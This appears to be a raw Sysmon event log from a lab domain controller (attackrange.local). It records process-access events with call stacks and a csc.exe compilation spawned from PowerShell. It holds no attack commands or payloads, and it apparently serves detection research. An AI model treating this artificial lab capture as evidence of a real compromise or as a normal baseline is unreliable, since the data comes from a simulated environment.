15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7C3C-5FA1-F602-000000008701}4484656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7C3C-5FA1-F702-000000008701}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.759{D28789B6-7C3C-5FA1-F702-000000008701}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESDE61.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCF6B0802FDCC4274BFA4282249ABDACB.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7C3C-5FA1-F602-000000008701}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\jfxp3ykk.cmdline" 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.716{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.716{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.716{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3C-5FA1-F602-000000008701}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3C-5FA1-F602-000000008701}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7C3B-5FA1-F402-000000008701}50842316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3C-5FA1-F602-000000008701}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF83B08BAAF) 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 